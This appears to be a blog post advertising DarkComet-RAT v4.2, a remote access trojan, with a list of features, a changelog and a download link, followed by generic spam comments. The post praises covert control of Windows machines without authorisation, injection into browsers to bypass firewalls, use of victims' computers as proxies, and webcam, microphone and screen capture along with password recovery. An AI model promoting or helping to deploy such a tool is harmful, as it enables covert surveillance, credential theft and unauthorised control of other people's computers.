DarkComet-RAT v.4.2 – Firewall bypass

DarkComet-RAT v.4.2 – Firewall bypass

 
DarkComet-RAT (Remote Administration Tool) is software design to control in the best condition and confort possible any kind of Microsoft Windows machine since Windows 2000.This software allow you to make hundreds of functions stealthly and remotely without any kind of autorisation in the remote process.Now this version is firewall bypass it will inject to web browsers and bypass firewall rules.Targets are in this order : Firefox, Opera, Chrome, Safari, Internet Explorer and Explorer if all fails (normally never) then it runs normally.
Notice now you can use remote computers as SOCKS5 proxies

changelog:

– Now server module doesn’t melt each times
– SOCKS5 Server added – Multithread.
– Camera streaming is now more stable
– Camera capture interval added
– Camera disable streatch enabled/disabled added
– File Manager doesn’t crash on transfer anymore
– Sound capture more stable and a bit faster
– New process manager GUI and more user friendly
– Process Dump added to the new process manager
– Screen capture totally recoded, faster in Vista and Seven than before
– Screen capture control more stable
– New password recovery using nirsoft tools (plugins like)

Download: http://www.darkcomet-rat.com

13 Comments

  1. I’m impressed, I must say. Actually rarely do I encounter a weblog that’s each educative and entertaining, and let me tell you, you may have hit the nail on the head. Your idea is outstanding; the difficulty is something that not sufficient people are talking intelligently about. I am very completely satisfied that I stumbled across this in my search for something relating to this.

    • thank’s

  2. You made some decent factors there. I seemed on the web for the difficulty and located most individuals will associate with with your website.

  3. very good submit, i definitely love this web site, carry on it

  4. Howdy! I simply wish to give an enormous thumbs up for the great data you have right here on this post. I can be coming back to your blog for more soon.

  5. pc…

    listed here are some url links to internet sites I always connect to seeing that we feel they are definitely worth checking out…

  6. I like your writing style truly loving this web site .

  7. There are definitely quite a lot of particulars like that to take into consideration. That is a great level to carry up. I supply the ideas above as basic inspiration but clearly there are questions just like the one you deliver up the place crucial factor will be working in trustworthy good faith. I don?t know if greatest practices have emerged around things like that, however I am positive that your job is clearly identified as a fair game. Both girls and boys feel the influence of just a moment’s pleasure, for the remainder of their lives.

  8. Good site and incredibly enlightening. Thanks for taking the time to write it and post it!

    • Ok. thanks for visiting

  9. I used to be very happy to search out this internet-site.I wanted to thanks on your time for this glorious learn!! I undoubtedly enjoying each little bit of it and I’ve you bookmarked to take a look at new stuff you weblog post.

  10. Modern Warfare 3…

    I saw this really great post today so I had to repost……………….

  11. Awesome read. I just passed this onto a colleague who was doing a little research on that. He just bought me lunch because I found it for him! Thus let me rephrase: Thanks for lunch! I have bookmarked your web page: https://seclist.wordpress.com/2011/10/04/darkcomet-rat-v-4-2-firewall-bypass/ and will check back often. Thanks for the awesome article!


Sorry, the comment form is closed at this time.

Comments RSS